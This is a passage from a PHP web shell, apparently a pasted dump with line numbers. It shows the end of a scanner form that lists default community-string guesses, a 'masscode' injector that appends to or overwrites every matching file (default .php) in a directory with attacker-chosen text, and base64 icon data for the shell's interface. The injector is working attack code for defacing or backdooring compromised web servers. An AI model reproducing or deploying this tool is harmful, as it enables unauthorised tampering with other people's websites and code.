router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
  7104. }
  7105. }
  7106.  
  7107. if ($act == "masscode")
  7108. {
  7109. if(isset($_POST['dir']) &&
  7110.     $_POST['dir'] != '' &&
  7111.     isset($_POST['filetype']) &&
  7112.     $_POST['filetype'] != '' &&
  7113.     isset($_POST['mode']) &&
  7114.     $_POST['mode'] != '' &&
  7115.     isset($_POST['message']) &&
  7116.     $_POST['message'] != ''
  7117.     )
  7118.     {
  7119.         $dir = $_POST['dir'];
  7120.         $filetype = $_POST['filetype'];
  7121.         $message = $_POST['message'];
  7122.        
  7123.         $mode = "a"; //default mode
  7124.        
  7125.        
  7126.         // Modes Begin
  7127.        
  7128.         if($_POST['mode'] == 'Apender')
  7129.         {
  7130.             $mode = "a";
  7131.         }
  7132.         if($_POST['mode'] == 'Overwriter')
  7133.         {
  7134.             $mode = "w";
  7135.         }
  7136.        
  7137.         if($handle = opendir($dir))
  7138.         {
  7139.             ?>
  7140.             Overwritten Files :-
  7141.             <ul style="padding: 5px;" >
  7142.             <?php
  7143.             while(($file = readdir($handle)) !== False)
  7144.             {
  7145.                 if((preg_match("/$filetype".'$'.'/', $file , $matches) != 0) && (preg_match('/'.$file.'$/', $self , $matches) != 1))
  7146.                 {
  7147.                     ?>
  7148.                         <li class="file"><a href="<?php echo "$self?open=$dir$file"?>"><?php echo $file; ?></a></li>
  7149.                     <?php
  7150.                     echo "\n";
  7151.                     $fd = fopen($dir.$file,$mode);
  7152.             if (!$fd) echo "<p><font color=red>Permission Denied</font></p>"; break;
  7153.                     fwrite($fd,$message);
  7154.                 }
  7155.             }
  7156.             ?>
  7157.             </ul>
  7158.             <?php
  7159.         }
  7160.     }
  7161.     else
  7162.     {
  7163.         ?>
  7164.         <table >
  7165.        
  7166.             <form method='POST'>
  7167.             <input type="hidden" name="injector"/>  
  7168.                 <tr>
  7169.                     <td class="title">
  7170.                         Directory
  7171.                     </td>
  7172.                     <td>
  7173.                          <input name="dir" value="<?php echo getcwd().$SEPARATOR; ?>" />
  7174.                     </td>
  7175.                 </tr>
  7176.                 <tr>
  7177.                 <td class="title">
  7178.                     Mode
  7179.                 </td>
  7180.                 <td>
  7181.                         <select style="width: 125px;" name="mode">
  7182.                             <option value="Apender">Apender</option>
  7183.                             <option value="Overwriter">Overwriter</option>
  7184.                         </select>
  7185.                 </td>
  7186.                 </tr>
  7187.                 <tr>
  7188.                     <td class="title">
  7189.                         File Type
  7190.                     </td>
  7191.                     <td>
  7192.                         <input type="text" class="cmd" name="filetype" value=".php" onblur="if(this.value=='')this.value='.php';" />
  7193.                     </td>
  7194.                 </tr>
  7195.                
  7196.                
  7197.                 <tr>
  7198.                     <td colspan="2">
  7199.                         <textarea name="message" cols="110" rows="10" class="cmd">I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea>
  7200.                     </td>
  7201.                 </tr>
  7202.                
  7203.                
  7204.                 <tr>
  7205.                     <td rowspan="2">
  7206.                         <input style="margin : 20px; margin-left: 315px; padding : 10px; width: 100px;" type="submit" value="Inject :D"/>
  7207.                     </td>
  7208.                 </tr>
  7209.         </form>
  7210.         </table>
  7211.         <?php
  7212.     }
  7213. }
  7214.  
  7215. }
  7216. else
  7217.  
  7218. {
  7219.  
  7220.  @ob_clean();
  7221.  
  7222.  $images = array(
  7223.  
  7224. "arrow_ltr"=>
  7225.  
  7226. "R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
  7227.  
  7228. "SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
  7229.  
  7230. "back"=>
  7231.  
  7232. "R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  7233.  
  7234. "aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
  7235.  
  7236. "Wg0JADs=",
  7237.  
  7238. "buffer"=>
  7239.  
  7240. "R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
  7241.  
  7242. "eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
  7243.  
  7244. "Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
  7245.  
  7246. "change"=>
  7247.  
  7248. "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
  7249.  
  7250. "/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
  7251.  
  7252. "AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
  7253.  
  7254. "wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
  7255.  
  7256. "CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
  7257.  
  7258. "zMshADs=",
  7259.  
  7260. "delete"=>
  7261.  
  7262. "R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
  7263.  
  7264. "6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
  7265.  
  7266. "sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
  7267.  
  7268. "vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
  7269.  
  7270. "ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
  7271.  
  7272. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7273.  
  7274. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
  7275.  
  7276. "BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
  7277.  
  7278. "STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
  7279.  
  7280. "BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
  7281.  
  7282. "jwVFHBgiEGQFIgQasYkcSbJQIAA7",
  7283.  
  7284. "download"=>
  7285.  
  7286. "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
  7287.  
  7288. "AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
  7289.  
  7290. "EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
  7291.  
  7292. "forward"=>
  7293.  
  7294. "R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  7295.  
  7296. "aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
  7297.  
  7298. "WqsJADs=",
  7299.  
  7300. "home"=>
  7301.  
  7302. "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
  7303.  
  7304. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
  7305.  
  7306. "krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
  7307.  
  7308. "VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
  7309.  
  7310. "mode"=>
  7311.  
  7312. "R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
  7313.  
  7314. "AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
  7315.  
  7316. "2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
  7317.  
  7318. "dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
  7319.  
  7320. "refresh"=>
  7321.  
  7322. "R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
  7323.  
  7324. "AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
  7325.  
  7326. "3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
  7327.  
  7328. "R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
  7329.  
  7330. "search"=>
  7331.  
  7332. "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
  7333.  
  7334. "/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
  7335.  
  7336. "s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
  7337.  
  7338. "AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
  7339.  
  7340. "Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
  7341.  
  7342. "setup"=>
  7343.  
  7344. "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
  7345.  
  7346. "QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  7347.  
  7348. "ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
  7349.  
  7350. "qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
  7351.  
  7352. "OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
  7353.  
  7354. "small_dir"=>
  7355.  
  7356. "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
  7357.  
  7358. "AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
  7359.  
  7360. "/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
  7361.  
  7362. "small_unk"=>
  7363.  
  7364. "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
  7365.  
  7366. "p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
  7367.  
  7368. "/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
  7369.  
  7370. "/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
  7371.  
  7372. "/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
  7373.  
  7374. "wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
  7375.  
  7376. "9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
  7377.  
  7378. "66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
  7379.  
  7380. "24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7381.  
  7382. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7383.  
  7384. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7385.  
  7386. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7387.  
  7388. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7389.  
  7390. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7391.  
  7392. "AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
  7393.  
  7394. "aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
  7395.  
  7396. "uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
  7397.  
  7398. "yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
  7399.  
  7400. "yAsokBkQADs=",
  7401.  
  7402. "multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
  7403.  
  7404. "pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
  7405.  
  7406. "sort_asc"=>
  7407.  
  7408. "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
  7409.  
  7410. "SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
  7411.  
  7412. "sort_desc"=>
  7413.  
  7414. "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
  7415.  
  7416. "SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
  7417.  
  7418. "sql_button_drop"=>
  7419.  
  7420. "R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  7421.  
  7422. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7423.  
  7424. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  7425.  
  7426. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  7427.  
  7428. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  7429.  
  7430. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  7431.  
  7432. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  7433.  
  7434. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  7435.  
  7436. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  7437.  
  7438. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  7439.  
  7440. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  7441.  
  7442. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  7443.  
  7444. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
  7445.  
  7446. "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
  7447.  
  7448. "AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
  7449.  
  7450. "AQEAOw==",
  7451.  
  7452. "sql_button_empty"=>
  7453.  
  7454. "R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  7455.  
  7456. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7457.  
  7458. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  7459.  
  7460. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  7461.  
  7462. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  7463.  
  7464. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  7465.  
  7466. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  7467.  
  7468. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  7469.  
  7470. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  7471.  
  7472. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  7473.  
  7474. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  7475.  
  7476. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  7477.  
  7478. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
  7479.  
  7480. "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
  7481.  
  7482. "AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
  7483.  
  7484. "sql_button_insert"=>
  7485.  
  7486. "R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  7487.  
  7488. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7489.  
  7490. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  7491.  
  7492. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  7493.  
  7494. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  7495.  
  7496. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  7497.  
  7498. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  7499.  
  7500. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  7501.  
  7502. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  7503.  
  7504. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  7505.  
  7506. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  7507.  
  7508. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  7509.  
  7510. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
  7511.  
  7512. "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
  7513.  
  7514. "AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
  7515.  
  7516. "up"=>
  7517.  
  7518. "R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
  7519.  
  7520. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
  7521.  
  7522. "+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
  7523.  
  7524. "IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
  7525.  
  7526. "write"=>
  7527.  
  7528. "R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
  7529.  
  7530. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
  7531.  
  7532. "EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
  7533.  
  7534. "LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
  7535.  
  7536. "ext_asp"=>
  7537.  
  7538. "R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
  7539.  
  7540. "/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
  7541.  
  7542. "D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
  7543.  
  7544. "ext_mp3"=>
  7545.  
  7546. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
  7547.  
  7548. "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
  7549.  
  7550. "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
  7551.  
  7552. "ext_avi"=>
  7553.  
  7554. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
  7555.  
  7556. "WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
  7557.  
  7558. "PYXCyg+V2i44XeRmSfYqsGhAAgA7",
  7559.  
  7560. "ext_cgi"=>
  7561.  
  7562. "R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
  7563.  
  7564. "DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
  7565.  
  7566. "LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
  7567.  
  7568. "Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
  7569.  
  7570. "Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7571.  
  7572. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7573.  
  7574. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7575.  
  7576. "AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
  7577.  
  7578. "BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
  7579.  
  7580. "AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
  7581.  
  7582. "RYtMAgEAOw==",
  7583.  
  7584. "ext_cmd"=>
  7585.  
  7586. "R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
  7587.  
  7588. "eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
  7589.  
  7590. "dmrYAMn1onq/YKpjvEgAADs=",
  7591.  
  7592. "ext_cpp"=>
  7593.  
  7594. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
  7595.  
  7596. "WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
  7597.  
